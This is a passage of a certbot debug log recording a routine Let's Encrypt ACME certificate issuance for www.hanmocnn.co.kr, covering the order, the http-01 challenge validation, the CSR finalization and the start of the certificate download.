2026-02-14 22:37:00,344:DEBUG:certbot._internal.display.obj:Notifying user: Account registered.
2026-02-14 22:37:00,344:DEBUG:certbot._internal.main:Picked account: <Account(RegistrationResource(body=Registration(key=JWKRSA(key=<ComparableRSAKey(<cryptography.hazmat.bindings._rust.openssl.rsa.RSAPublicKey object at 0xffffaae470f0>)>), contact=(), agreement=None, status='valid', terms_of_service_agreed=None, only_return_existing=None, external_account_binding=None), uri='https://acme-v02.api.letsencrypt.org/acme/acct/3064386906', new_authzr_uri=None, terms_of_service='https://letsencrypt.org/documents/LE-SA-v1.6-August-18-2025.pdf'), ce2ddac5740bb12d4d6591b7fa1728af, Meta(creation_dt=datetime.datetime(2026, 2, 14, 22, 37, tzinfo=datetime.timezone.utc), creation_host='312f7928d5ba', register_to_eff=None))>
2026-02-14 22:37:00,345:DEBUG:certbot._internal.display.obj:Notifying user: Requesting a certificate for www.hanmocnn.co.kr
2026-02-14 22:37:00,348:DEBUG:acme.client:JWS payload:
b'{\n "identifiers": [\n {\n "type": "dns",\n "value": "www.hanmocnn.co.kr"\n }\n ]\n}'
2026-02-14 22:37:00,353:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/new-order:
{
"protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJxTFBUc2R0ZkRfZTFCem1kdUU3SkNnZHlJVGJ3a0xxZmtpRjAzVXVCS0NXclFqa3VuRzAiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL25ldy1vcmRlciJ9",
"signature": "Mlj3TT4WmdvYZDh8uhxl04owClgR7elXmEmweyy7r-Vbvb3KRbbJRMt4so7IBeilHnTdZWWzWjsm2J_1Rc0wD4yYxGcVX4k6_rTEp1VLtXGvw4YCR7u1u-R5mXWi_Y63qgZiBn-ipdyddrnqZxQ7AduHn4pO76M2-bOtK3_6Xh9Ng9LLCRE3vdlqaVOhq9DgRYd6Ha5rPLcEx_h3l6kkknTch2JR7gnoAUKqtiJr43nCz9TD8WlJukSRB3aBjFt5FpryZG4os8euZsohgI78gr9w6Hx19ylUEJNpOUvJH_6nMtEZXBO3piEz9CRTJluj7w3Fokskx1-ECEQ7PiWVdw",
"payload": "ewogICJpZGVudGlmaWVycyI6IFsKICAgIHsKICAgICAgInR5cGUiOiAiZG5zIiwKICAgICAgInZhbHVlIjogInd3dy5oYW5tb2Nubi5jby5rciIKICAgIH0KICBdCn0"
}
2026-02-14 22:37:00,654:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/new-order HTTP/1.1" 201 352
2026-02-14 22:37:00,655:DEBUG:acme.client:Received response:
HTTP 201
Server: nginx
Date: Sat, 14 Feb 2026 22:37:00 GMT
Content-Type: application/json
Content-Length: 352
Connection: keep-alive
Boulder-Requester: 3064386906
Cache-Control: public, max-age=0, no-cache
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index"
Location: https://acme-v02.api.letsencrypt.org/acme/order/3064386906/480355794976
Replay-Nonce: qLPTsdtfk80m9uZOMtD94pI3q_mEC5u6q7OKcCUpnm2-R4pTzfo
X-Frame-Options: DENY
Strict-Transport-Security: max-age=604800
{
"status": "pending",
"expires": "2026-02-21T22:37:00Z",
"identifiers": [
{
"type": "dns",
"value": "www.hanmocnn.co.kr"
}
],
"authorizations": [
"https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658763864386"
],
"finalize": "https://acme-v02.api.letsencrypt.org/acme/finalize/3064386906/480355794976"
}
2026-02-14 22:37:00,655:DEBUG:acme.client:Storing nonce: qLPTsdtfk80m9uZOMtD94pI3q_mEC5u6q7OKcCUpnm2-R4pTzfo
2026-02-14 22:37:00,655:DEBUG:acme.client:JWS payload:
b''
2026-02-14 22:37:00,660:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658763864386:
{
"protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJxTFBUc2R0Zms4MG05dVpPTXREOTRwSTNxX21FQzV1NnE3T0tjQ1Vwbm0yLVI0cFR6Zm8iLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzMwNjQzODY5MDYvNjU4NzYzODY0Mzg2In0",
"signature": "EBACfPJ7VkN3vjihrLhDjxuplvbL6fQ8cKAkxjykdYkUCe-LRj7aQSloC1b8jPHcUwK-NjB682PVYP5DdFNgolvdhv9XrEocveAkITYWnkkE7LT0OoQs1ZkKjt796EuNguAhfrmzNmAJLAiTnNexapEcvgu9wrlyUJl7NP6f_W1jMjw0kSzQgbwdheUgnySv0vygHIg441deXaxSUmU1EsUIVUxPFCcbE0zzWNjHT0CHfr8sQkSUDVaWZuipRHE10KbLeCYsWeYTw--Pgc0VHd66DJVJRTjZ6idGwmKm5Md0LfAAzqzGLsY5rfGdpZuFG-2bVax4bZhpfCCXq5IvvQ",
"payload": ""
}
2026-02-14 22:37:00,838:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/3064386906/658763864386 HTTP/1.1" 200 826
2026-02-14 22:37:00,839:DEBUG:acme.client:Received response:
HTTP 200
Server: nginx
Date: Sat, 14 Feb 2026 22:37:00 GMT
Content-Type: application/json
Content-Length: 826
Connection: keep-alive
Boulder-Requester: 3064386906
Cache-Control: public, max-age=0, no-cache
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index"
Replay-Nonce: QkEzerAfss7X9qQyQnyeKwUBeoFBNPIiq6cM0QWaVf2-UORyscA
X-Frame-Options: DENY
Strict-Transport-Security: max-age=604800
{
"identifier": {
"type": "dns",
"value": "www.hanmocnn.co.kr"
},
"status": "pending",
"expires": "2026-02-21T22:37:00Z",
"challenges": [
{
"type": "http-01",
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658763864386/WorYEw",
"status": "pending",
"token": "wp-HSjbr4Fy8FC9IwwKqKWcz8k66yXQtla_0042joNo"
},
{
"type": "dns-01",
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658763864386/_Sicnw",
"status": "pending",
"token": "wp-HSjbr4Fy8FC9IwwKqKWcz8k66yXQtla_0042joNo"
},
{
"type": "tls-alpn-01",
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658763864386/L-PpnQ",
"status": "pending",
"token": "wp-HSjbr4Fy8FC9IwwKqKWcz8k66yXQtla_0042joNo"
}
]
}
2026-02-14 22:37:00,839:DEBUG:acme.client:Storing nonce: QkEzerAfss7X9qQyQnyeKwUBeoFBNPIiq6cM0QWaVf2-UORyscA
2026-02-14 22:37:00,839:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658763864386/L-PpnQ', 'status': 'pending', 'token': 'wp-HSjbr4Fy8FC9IwwKqKWcz8k66yXQtla_0042joNo'}
2026-02-14 22:37:00,840:INFO:certbot._internal.auth_handler:Performing the following challenges:
2026-02-14 22:37:00,840:INFO:certbot._internal.auth_handler:http-01 challenge for Identifier(typ=IdentifierType(dns), value='www.hanmocnn.co.kr')
2026-02-14 22:37:00,840:INFO:certbot._internal.plugins.webroot:Using the webroot path /data/letsencrypt-acme-challenge for all unmatched domains.
2026-02-14 22:37:00,841:DEBUG:certbot._internal.plugins.webroot:Creating root challenges validation dir at /data/letsencrypt-acme-challenge/.well-known/acme-challenge
2026-02-14 22:37:00,842:DEBUG:certbot._internal.plugins.webroot:Attempting to save validation to /data/letsencrypt-acme-challenge/.well-known/acme-challenge/wp-HSjbr4Fy8FC9IwwKqKWcz8k66yXQtla_0042joNo
2026-02-14 22:37:00,843:DEBUG:acme.client:JWS payload:
b'{}'
2026-02-14 22:37:00,847:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658763864386/WorYEw:
{
"protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJRa0V6ZXJBZnNzN1g5cVF5UW55ZUt3VUJlb0ZCTlBJaXE2Y00wUVdhVmYyLVVPUnlzY0EiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2NoYWxsLzMwNjQzODY5MDYvNjU4NzYzODY0Mzg2L1dvcllFdyJ9",
"signature": "V9gJFKwdEeNbkiteGzJnt2imLg86cSLCFMkKmbVxzDIE9lZUZqYPJdq6U_BH45GwSAHmJGYNC4aSzFz6Axsyojnnem419sFjBw0cEF_CqDqmDkRiPOHOm4EpGxRC9fIYPPR43vXDAeGR_5o0M2CR0RAHOoqmweih8O3wYx6vsMPYUk_hDYaykd7EPNt1o7HVITqdfsAEcfRHo7D6o01egijhdDjHuzy5mwXzi88VyBNtsRm7VY4oj_14HwH-y1ehZnlFidof7FkG2drlL70uG5uoC5H7x8GaagJHDPV7xYjWm91p_ElcK5QNUngXw9sYeuMwGbTZTQEbfteif80rCg",
"payload": "e30"
}
2026-02-14 22:37:01,026:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/chall/3064386906/658763864386/WorYEw HTTP/1.1" 200 195
2026-02-14 22:37:01,027:DEBUG:acme.client:Received response:
HTTP 200
Server: nginx
Date: Sat, 14 Feb 2026 22:37:00 GMT
Content-Type: application/json
Content-Length: 195
Connection: keep-alive
Boulder-Requester: 3064386906
Cache-Control: public, max-age=0, no-cache
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index", <https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658763864386>;rel="up"
Location: https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658763864386/WorYEw
Replay-Nonce: qLPTsdtfcTzEfvOVlnCkQVlTu9z3A5NW8JFOBehHtJSEWrRy7Gk
X-Frame-Options: DENY
Strict-Transport-Security: max-age=604800
{
"type": "http-01",
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658763864386/WorYEw",
"status": "pending",
"token": "wp-HSjbr4Fy8FC9IwwKqKWcz8k66yXQtla_0042joNo"
}
2026-02-14 22:37:01,027:DEBUG:acme.client:Storing nonce: qLPTsdtfcTzEfvOVlnCkQVlTu9z3A5NW8JFOBehHtJSEWrRy7Gk
2026-02-14 22:37:01,028:INFO:certbot._internal.auth_handler:Waiting for verification...
2026-02-14 22:37:02,028:DEBUG:acme.client:JWS payload:
b''
2026-02-14 22:37:02,033:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658763864386:
{
"protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJxTFBUc2R0ZmNUekVmdk9WbG5Da1FWbFR1OXozQTVOVzhKRk9CZWhIdEpTRVdyUnk3R2siLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzMwNjQzODY5MDYvNjU4NzYzODY0Mzg2In0",
"signature": "XXADX0L4Qrbg3ERRW4CsnjWzKwsDJUkJdZX7a9xtX3gh0KgdJGOfXkdpcx7qttBvXus85dJ7QA25ZKXLNNqARxpoJDeP9pr73ZZYYB7Fwt9wyVSQ-yreoINf6zkJbyvVWLQPIXIvty7xvwMDqhTXS1Q1A_OsPcpz8s1tYWr8pDWgzvrT7EJKSm3MUzOcZtuBqMMGlBeKwfuXmVhJCO5JADAM7gOrvRviojM5RY6XkKKUFCAn8TSQupuUKNKEYRI_zksrj6KWJdalvT5jlTLXDlfBhnjPiaT-MR_xV-_B2PAkiH1JiRGsGPHkiroCqN20WV4Ru1cDjzXybn6Q8LH6Ow",
"payload": ""
}
2026-02-14 22:37:02,211:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/3064386906/658763864386 HTTP/1.1" 200 826
2026-02-14 22:37:02,212:DEBUG:acme.client:Received response:
HTTP 200
Server: nginx
Date: Sat, 14 Feb 2026 22:37:02 GMT
Content-Type: application/json
Content-Length: 826
Connection: keep-alive
Boulder-Requester: 3064386906
Cache-Control: public, max-age=0, no-cache
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index"
Replay-Nonce: QkEzerAfrOZM6pTRJ4EJQ8GVGPpmxiHIzMVbeb8qS9Im2CeQvr0
X-Frame-Options: DENY
Strict-Transport-Security: max-age=604800
{
"identifier": {
"type": "dns",
"value": "www.hanmocnn.co.kr"
},
"status": "pending",
"expires": "2026-02-21T22:37:00Z",
"challenges": [
{
"type": "dns-01",
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658763864386/_Sicnw",
"status": "pending",
"token": "wp-HSjbr4Fy8FC9IwwKqKWcz8k66yXQtla_0042joNo"
},
{
"type": "http-01",
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658763864386/WorYEw",
"status": "pending",
"token": "wp-HSjbr4Fy8FC9IwwKqKWcz8k66yXQtla_0042joNo"
},
{
"type": "tls-alpn-01",
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658763864386/L-PpnQ",
"status": "pending",
"token": "wp-HSjbr4Fy8FC9IwwKqKWcz8k66yXQtla_0042joNo"
}
]
}
2026-02-14 22:37:02,212:DEBUG:acme.client:Storing nonce: QkEzerAfrOZM6pTRJ4EJQ8GVGPpmxiHIzMVbeb8qS9Im2CeQvr0
2026-02-14 22:37:02,213:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658763864386/L-PpnQ', 'status': 'pending', 'token': 'wp-HSjbr4Fy8FC9IwwKqKWcz8k66yXQtla_0042joNo'}
2026-02-14 22:37:05,213:DEBUG:acme.client:JWS payload:
b''
2026-02-14 22:37:05,218:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658763864386:
{
"protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJRa0V6ZXJBZnJPWk02cFRSSjRFSlE4R1ZHUHBteGlISXpNVmJlYjhxUzlJbTJDZVF2cjAiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzMwNjQzODY5MDYvNjU4NzYzODY0Mzg2In0",
"signature": "xgjZ-8HW8sNrxs3JL8y5PoqZpwY0ieg3tRCZB1WKBlmFahkLg4oGGoVRo69CDo4Mo6XcEvbPIhhvihqxwkBjMWutSOuyrNbAGhnt70aJ8I-Mk4oQVKjvREs3FG9Lx2CjBC9CxXOJV4GKeBlalRA_kvUjqMvHcczfNWY0jREsvMlSAJPxVc982wr8oRepVP8HMCp7fXMtcIj25rD1Eq-IT68kngbRx73a6tO10Q78Qea4HVM1xGKl-OwCCjdwPIBUuSs6v8REwYjtoUBdNB6iry6Bh5TjUJGZY6KGjGYYaNtyBwjCw_zyUbWxXdQofPKcPeLUHfcN1y-K8kpri0-Bdw",
"payload": ""
}
2026-02-14 22:37:05,396:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/3064386906/658763864386 HTTP/1.1" 200 826
2026-02-14 22:37:05,397:DEBUG:acme.client:Received response:
HTTP 200
Server: nginx
Date: Sat, 14 Feb 2026 22:37:05 GMT
Content-Type: application/json
Content-Length: 826
Connection: keep-alive
Boulder-Requester: 3064386906
Cache-Control: public, max-age=0, no-cache
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index"
Replay-Nonce: qLPTsdtf5E_tE0oZ9wXt2UihFzz5Hj2_fQraJrZY1ZcVaYjHops
X-Frame-Options: DENY
Strict-Transport-Security: max-age=604800
{
"identifier": {
"type": "dns",
"value": "www.hanmocnn.co.kr"
},
"status": "pending",
"expires": "2026-02-21T22:37:00Z",
"challenges": [
{
"type": "http-01",
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658763864386/WorYEw",
"status": "pending",
"token": "wp-HSjbr4Fy8FC9IwwKqKWcz8k66yXQtla_0042joNo"
},
{
"type": "tls-alpn-01",
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658763864386/L-PpnQ",
"status": "pending",
"token": "wp-HSjbr4Fy8FC9IwwKqKWcz8k66yXQtla_0042joNo"
},
{
"type": "dns-01",
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658763864386/_Sicnw",
"status": "pending",
"token": "wp-HSjbr4Fy8FC9IwwKqKWcz8k66yXQtla_0042joNo"
}
]
}
2026-02-14 22:37:05,397:DEBUG:acme.client:Storing nonce: qLPTsdtf5E_tE0oZ9wXt2UihFzz5Hj2_fQraJrZY1ZcVaYjHops
2026-02-14 22:37:05,397:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658763864386/L-PpnQ', 'status': 'pending', 'token': 'wp-HSjbr4Fy8FC9IwwKqKWcz8k66yXQtla_0042joNo'}
2026-02-14 22:37:08,398:DEBUG:acme.client:JWS payload:
b''
2026-02-14 22:37:08,403:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658763864386:
{
"protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJxTFBUc2R0ZjVFX3RFMG9aOXdYdDJVaWhGeno1SGoyX2ZRcmFKclpZMVpjVmFZakhvcHMiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzMwNjQzODY5MDYvNjU4NzYzODY0Mzg2In0",
"signature": "AWB5-r41LjGxMZKcCfb_inrjOcjW4O9dkvUox3c_KIMn5qqzDTMnymKL4ilAXge0HM_g_rbIs8gDYHFvRpGPPxLxhg66ayoYKDypjAeeK5Z2884KK8zRBAlhdS_CXny-hl-hUcTO9y9VZOTKwoT0QEKUE3N-g2qrKJkhSkN6x6zSDo1OKx_oVdiM65VwCXk0p556topXMj8iyAnuOAYkMxId-vsPYGxZVRocPofhwaxChxkfC21B8gysD57qEdfbjN8yk5nBo3IzipeZOvYlTTN8mimf5c0-4DVLnnEvpvWYxOQdTUYyrxXTuPvF-I0vrc2jh1d4h6G7H6LbI7Io3g",
"payload": ""
}
2026-02-14 22:37:08,590:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/3064386906/658763864386 HTTP/1.1" 200 777
2026-02-14 22:37:08,591:DEBUG:acme.client:Received response:
HTTP 200
Server: nginx
Date: Sat, 14 Feb 2026 22:37:08 GMT
Content-Type: application/json
Content-Length: 777
Connection: keep-alive
Boulder-Requester: 3064386906
Cache-Control: public, max-age=0, no-cache
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index"
Replay-Nonce: QkEzerAfBWhgCrRIv-bvqdsH1Pi3gqZOHr3atrovjCPJmZbuetI
X-Frame-Options: DENY
Strict-Transport-Security: max-age=604800
{
"identifier": {
"type": "dns",
"value": "www.hanmocnn.co.kr"
},
"status": "valid",
"expires": "2026-03-16T22:37:07Z",
"challenges": [
{
"type": "http-01",
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658763864386/WorYEw",
"status": "valid",
"validated": "2026-02-14T22:37:00Z",
"token": "wp-HSjbr4Fy8FC9IwwKqKWcz8k66yXQtla_0042joNo",
"validationRecord": [
{
"url": "http://www.hanmocnn.co.kr/.well-known/acme-challenge/wp-HSjbr4Fy8FC9IwwKqKWcz8k66yXQtla_0042joNo",
"hostname": "www.hanmocnn.co.kr",
"port": "80",
"addressesResolved": [
"222.117.41.51"
],
"addressUsed": "222.117.41.51"
}
]
}
]
}
2026-02-14 22:37:08,591:DEBUG:acme.client:Storing nonce: QkEzerAfBWhgCrRIv-bvqdsH1Pi3gqZOHr3atrovjCPJmZbuetI
2026-02-14 22:37:08,592:DEBUG:certbot._internal.error_handler:Calling registered functions
2026-02-14 22:37:08,592:INFO:certbot._internal.auth_handler:Cleaning up challenges
2026-02-14 22:37:08,592:DEBUG:certbot._internal.plugins.webroot:Removing /data/letsencrypt-acme-challenge/.well-known/acme-challenge/wp-HSjbr4Fy8FC9IwwKqKWcz8k66yXQtla_0042joNo
2026-02-14 22:37:08,593:DEBUG:certbot._internal.plugins.webroot:All challenges cleaned up
2026-02-14 22:37:08,593:DEBUG:certbot._internal.client:CSR: CSR(file=None, data=b'-----BEGIN CERTIFICATE REQUEST-----\nMIIBKTCBrwIBADAAMHYwEAYHKoZIzj0CAQYFK4EEACIDYgAE/MAxS8qM7lfOK0GC\npkjFK+Gtq7W+m3A7S1v2CpGQ0QyVjglgLTeIEDMmfz/rVDpxJMw9BjlYx3ncotfZ\nFqm+alkg1CSB8uzGmv4wVZO9YMqgq1NYmn1+3b6avJBh6JgPoDAwLgYJKoZIhvcN\nAQkOMSEwHzAdBgNVHREEFjAUghJ3d3cuaGFubW9jbm4uY28ua3IwCgYIKoZIzj0E\nAwIDaQAwZgIxAKGLPAScVN7hS9XlaMdBbDMcfh+wj4pxQGFHZkuhZrDuevlNdKCY\n0jsVVWXbfjb5PgIxAPHhxjm8bbjXCwGTDlr+A5j+UjLbDzD0eAJAZMnr7AhEghuo\nWP+aZVUJiVAxp0Q5Iw==\n-----END CERTIFICATE REQUEST-----\n', form='pem')
2026-02-14 22:37:08,593:DEBUG:certbot._internal.client:Will poll for certificate issuance until 2026-02-14 22:38:38.593873
2026-02-14 22:37:08,594:DEBUG:acme.client:JWS payload:
b'{\n "csr": "MIIBKTCBrwIBADAAMHYwEAYHKoZIzj0CAQYFK4EEACIDYgAE_MAxS8qM7lfOK0GCpkjFK-Gtq7W-m3A7S1v2CpGQ0QyVjglgLTeIEDMmfz_rVDpxJMw9BjlYx3ncotfZFqm-alkg1CSB8uzGmv4wVZO9YMqgq1NYmn1-3b6avJBh6JgPoDAwLgYJKoZIhvcNAQkOMSEwHzAdBgNVHREEFjAUghJ3d3cuaGFubW9jbm4uY28ua3IwCgYIKoZIzj0EAwIDaQAwZgIxAKGLPAScVN7hS9XlaMdBbDMcfh-wj4pxQGFHZkuhZrDuevlNdKCY0jsVVWXbfjb5PgIxAPHhxjm8bbjXCwGTDlr-A5j-UjLbDzD0eAJAZMnr7AhEghuoWP-aZVUJiVAxp0Q5Iw"\n}'
2026-02-14 22:37:08,598:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/finalize/3064386906/480355794976:
{
"protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJRa0V6ZXJBZkJXaGdDclJJdi1idnFkc0gxUGkzZ3FaT0hyM2F0cm92akNQSm1aYnVldEkiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2ZpbmFsaXplLzMwNjQzODY5MDYvNDgwMzU1Nzk0OTc2In0",
"signature": "iRmbifxypVg8beho7vSjGtACjPanmSlW6Od_8g-3_3CiynaNwdPlfAeyza11sHzYYzq2D7SXqGLW_5zo4mk6m1O-gbVSFrCIdsyyjm28za5gZ6f7uJaOOONmQ8LIwA58r5kF8Xe_YUO7O-ZVMuL0YetMMdvENavksjcQ4Q9QqRRTFjYOlDsl3O-H2Gzz9y-5g_gZwmPKJH4ZeQZUhiaXLNTEZ3NbdciLkdHqiMv_szkwwZiUfsrcuRD4ci3drTQqOQwFlCbP6m8twuINoFRDnMmCL5EKETp-fOxR3OGaAYhWrk7Pb4uQJRLkpfYggh1Wp2TIS24klJaYP4DfIUSh0w",
"payload": "ewogICJjc3IiOiAiTUlJQktUQ0Jyd0lCQURBQU1IWXdFQVlIS29aSXpqMENBUVlGSzRFRUFDSURZZ0FFX01BeFM4cU03bGZPSzBHQ3BrakZLLUd0cTdXLW0zQTdTMXYyQ3BHUTBReVZqZ2xnTFRlSUVETW1mel9yVkRweEpNdzlCamxZeDNuY290ZlpGcW0tYWxrZzFDU0I4dXpHbXY0d1ZaTzlZTXFncTFOWW1uMS0zYjZhdkpCaDZKZ1BvREF3TGdZSktvWklodmNOQVFrT01TRXdIekFkQmdOVkhSRUVGakFVZ2hKM2QzY3VhR0Z1Ylc5amJtNHVZMjh1YTNJd0NnWUlLb1pJemowRUF3SURhUUF3WmdJeEFLR0xQQVNjVk43aFM5WGxhTWRCYkRNY2ZoLXdqNHB4UUdGSFprdWhackR1ZXZsTmRLQ1kwanNWVldYYmZqYjVQZ0l4QVBIaHhqbThiYmpYQ3dHVERsci1BNWotVWpMYkR6RDBlQUpBWk1ucjdBaEVnaHVvV1AtYVpWVUppVkF4cDBRNUl3Igp9"
}
2026-02-14 22:37:09,976:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/finalize/3064386906/480355794976 HTTP/1.1" 200 454
2026-02-14 22:37:09,977:DEBUG:acme.client:Received response:
HTTP 200
Server: nginx
Date: Sat, 14 Feb 2026 22:37:09 GMT
Content-Type: application/json
Content-Length: 454
Connection: keep-alive
Boulder-Requester: 3064386906
Cache-Control: public, max-age=0, no-cache
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index"
Location: https://acme-v02.api.letsencrypt.org/acme/order/3064386906/480355794976
Replay-Nonce: QkEzerAfsv9nV3Qq348LLnOxB92Qa-jIqeyURxhV7CClV-KNAmg
X-Frame-Options: DENY
Strict-Transport-Security: max-age=604800
{
"status": "valid",
"expires": "2026-02-21T22:37:00Z",
"identifiers": [
{
"type": "dns",
"value": "www.hanmocnn.co.kr"
}
],
"authorizations": [
"https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658763864386"
],
"finalize": "https://acme-v02.api.letsencrypt.org/acme/finalize/3064386906/480355794976",
"certificate": "https://acme-v02.api.letsencrypt.org/acme/cert/06c23a86319133c2ea94bad6232b83edc89c"
}
2026-02-14 22:37:09,978:DEBUG:acme.client:Storing nonce: QkEzerAfsv9nV3Qq348LLnOxB92Qa-jIqeyURxhV7CClV-KNAmg
2026-02-14 22:37:10,978:DEBUG:acme.client:JWS payload:
b''
2026-02-14 22:37:10,983:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/order/3064386906/480355794976:
{
"protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJRa0V6ZXJBZnN2OW5WM1FxMzQ4TExuT3hCOTJRYS1qSXFleVVSeGhWN0NDbFYtS05BbWciLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL29yZGVyLzMwNjQzODY5MDYvNDgwMzU1Nzk0OTc2In0",
"signature": "LtmzCt3fpthHfOuEe9PwhlSNbmXHLo8UAzVQ-ymmBpQEBYovhfGYvpBYizq7wKOLelz9oniGzPfAv-taGt7iHnrxs7qjW62KK58QVHItk47Ifdq2KAUjxYKG4yAHoxs_bkmxNngkWadBt4fn31PEQH9e4HTiO2Dh34A13V_o5vsDrugGP9fJ4WuEmewUhyqil2pz7FWqwpwkDJdtpEi_zbEdUVTuCg8UwwZfJPXGRUVWyhQVftmzJkW-RLqDWM--JUAZk4cGFsNecrY9c8WqIi4cG7ifIM-7Kc21ryX_Bvnki-egnCNyV8WSykWdKtzzPuNYkPVKD4euM4y9NNpZ-w",
"payload": ""
}
2026-02-14 22:37:11,173:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/order/3064386906/480355794976 HTTP/1.1" 200 454
2026-02-14 22:37:11,174:DEBUG:acme.client:Received response:
HTTP 200
Server: nginx
Date: Sat, 14 Feb 2026 22:37:11 GMT
Content-Type: application/json
Content-Length: 454
Connection: keep-alive
Cache-Control: public, max-age=0, no-cache
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index"
Location: https://acme-v02.api.letsencrypt.org/acme/order/3064386906/480355794976
Replay-Nonce: qLPTsdtftOchIQ67pfn4fKf79QhHr462qCSymeexd-q0zApziWM
X-Frame-Options: DENY
Strict-Transport-Security: max-age=604800
{
"status": "valid",
"expires": "2026-02-21T22:37:00Z",
"identifiers": [
{
"type": "dns",
"value": "www.hanmocnn.co.kr"
}
],
"authorizations": [
